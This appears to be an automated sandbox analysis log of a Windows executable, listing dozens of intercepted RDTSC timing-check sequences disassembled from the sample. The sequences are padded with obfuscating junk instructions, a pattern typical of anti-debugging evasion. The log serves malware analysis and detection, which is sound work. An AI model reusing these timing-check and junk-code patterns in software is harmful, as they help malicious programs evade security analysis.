Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F2E8A second address: 15F2EF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7C0FA6736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c movsx edi, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FC7C0FA6738h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ebx, 7F4B648Ch 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007FC7C0FA6738h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c add dword ptr [ebp+122D2398h], ecx 0x00000052 mov di, 7C2Bh 0x00000056 mov edi, eax 0x00000058 xchg eax, esi 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jbe 00007FC7C0FA6736h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F10CF second address: 15F10D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F1FA7 second address: 15F1FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC7C0FA673Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F1FB4 second address: 15F2061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FC7C1180B48h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC7C1180B38h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d jl 00007FC7C1180B37h 0x00000033 clc 0x00000034 and bx, 3C10h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FC7C1180B38h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov ebx, dword ptr [ebp+122D37E9h] 0x00000060 mov di, si 0x00000063 mov eax, dword ptr [ebp+122D0CEDh] 0x00000069 push FFFFFFFFh 0x0000006b mov dword ptr [ebp+122D317Dh], esi 0x00000071 nop 0x00000072 jmp 00007FC7C1180B42h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jns 00007FC7C1180B38h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F30C2 second address: 15F3102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007FC7C0FA674Eh 0x00000011 jmp 00007FC7C0FA6748h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F4F57 second address: 15F4F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F3102 second address: 15F316A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC7C0FA6736h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, dword ptr [ebp+122D359Dh] 0x0000001a push eax 0x0000001b mov bx, si 0x0000001e pop ebx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 jne 00007FC7C0FA673Ch 0x0000002c mov eax, dword ptr [ebp+122D0F99h] 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FC7C0FA6738h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov edi, ecx 0x0000004e mov edi, dword ptr [ebp+122D19C1h] 0x00000054 push FFFFFFFFh 0x00000056 mov edi, eax 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F316A second address: 15F3181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F7DA9 second address: 15F7DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC7C0FA673Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8D6B second address: 15F8D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8D70 second address: 15F8D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC7C0FA6736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F9BFE second address: 15F9C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FAB73 second address: 15FABDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jno 00007FC7C0FA6738h 0x00000011 jne 00007FC7C0FA673Ch 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FC7C0FA6738h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov bh, AAh 0x00000035 push 00000000h 0x00000037 movzx edi, si 0x0000003a push 00000000h 0x0000003c mov ebx, dword ptr [ebp+122D27A8h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FABDB second address: 15FABDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FABDF second address: 15FABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FABE3 second address: 15FABE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FCF01 second address: 15FCF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FCF10 second address: 15FCF22 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F4179 second address: 15F417E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F417E second address: 15F4184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F7F63 second address: 15F7F75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FC7C0FA6736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F7F75 second address: 15F7F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7C1180B44h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8068 second address: 15F806E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F806E second address: 15F8072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8072 second address: 15F8080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8080 second address: 15F8084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F8084 second address: 15F8092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC7C0FA6736h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F9DEA second address: 15F9DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F9DEE second address: 15F9DF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FAD30 second address: 15FAD3A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7C1180B3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15FAD3A second address: 15FADEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FC7C0FA6738h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 jmp 00007FC7C0FA6747h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov dword ptr [ebp+122D1AD2h], ebx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FC7C0FA6738h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 jng 00007FC7C0FA6742h 0x0000005a jnc 00007FC7C0FA673Ch 0x00000060 mov edi, dword ptr [ebp+122D185Fh] 0x00000066 mov eax, dword ptr [ebp+122D1679h] 0x0000006c mov dword ptr [ebp+122D1AFDh], esi 0x00000072 add ebx, 31FD78F5h 0x00000078 push FFFFFFFFh 0x0000007a push ecx 0x0000007b mov edi, dword ptr [ebp+122D3619h] 0x00000081 pop edi 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push edx 0x00000086 jmp 00007FC7C0FA673Bh 0x0000008b pop edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 159EA35 second address: 159EA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 159EA39 second address: 159EA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC7C0FA673Ah 0x0000000d jmp 00007FC7C0FA6746h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 159EA61 second address: 159EA69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 159EA69 second address: 159EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 159EA6F second address: 159EA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160146C second address: 1601472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601472 second address: 1601476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601476 second address: 1601481 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601481 second address: 16014A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B43h 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jo 00007FC7C1180B36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16014A4 second address: 16014AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16014AA second address: 16014F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC7C1180B47h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7C1180B47h 0x00000011 jmp 00007FC7C1180B47h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160160A second address: 1601615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC7C0FA6736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601615 second address: 1601637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC7C1180B44h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601637 second address: 160164D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC7C0FA673Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160164D second address: 1601653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1601653 second address: 1601659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16017AC second address: 16017B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16018E2 second address: 16018E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605A90 second address: 1605A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605A96 second address: 1605A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605B26 second address: 1605B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605B2B second address: 1605B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605B31 second address: 1605B62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC7C1180B45h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC7C1180B3Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605B62 second address: 1605B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605C60 second address: 1605C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605C65 second address: 1605C7F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7C0FA673Ch 0x00000008 jc 00007FC7C0FA6736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605C7F second address: 1605CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007FC7C1180B47h 0x0000000e jmp 00007FC7C1180B46h 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605CC0 second address: 1605CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605CC4 second address: 1605CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605CCA second address: 1605CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1605CD0 second address: 1605CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160B5C5 second address: 160B5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FC7C0FA6743h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160B994 second address: 160B9AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160B9AE second address: 160B9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7C0FA6736h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC7C0FA673Bh 0x00000016 jmp 00007FC7C0FA673Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160B9DA second address: 160B9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC7C1180B3Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160BE14 second address: 160BE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160BE18 second address: 160BE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 160BE23 second address: 160BE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC7C0FA6736h 0x0000000a pop edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16101CB second address: 16101CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E735F second address: 15E73F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC7C0FA6738h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1244474Eh], edi 0x0000002d lea eax, dword ptr [ebp+1247B11Ch] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC7C0FA6738h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d sub edx, 4B72F81Ch 0x00000053 nop 0x00000054 jmp 00007FC7C0FA6749h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FC7C0FA6749h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E73F8 second address: 15E73FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E73FE second address: 15C5E3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007FC7C0FA6736h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC7C0FA6738h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jno 00007FC7C0FA673Ch 0x0000002d call dword ptr [ebp+122D1F95h] 0x00000033 push ebx 0x00000034 jne 00007FC7C0FA674Fh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E78AF second address: 15E78B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E78B6 second address: 15E78C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC7C0FA6736h 0x0000000a rdtsc
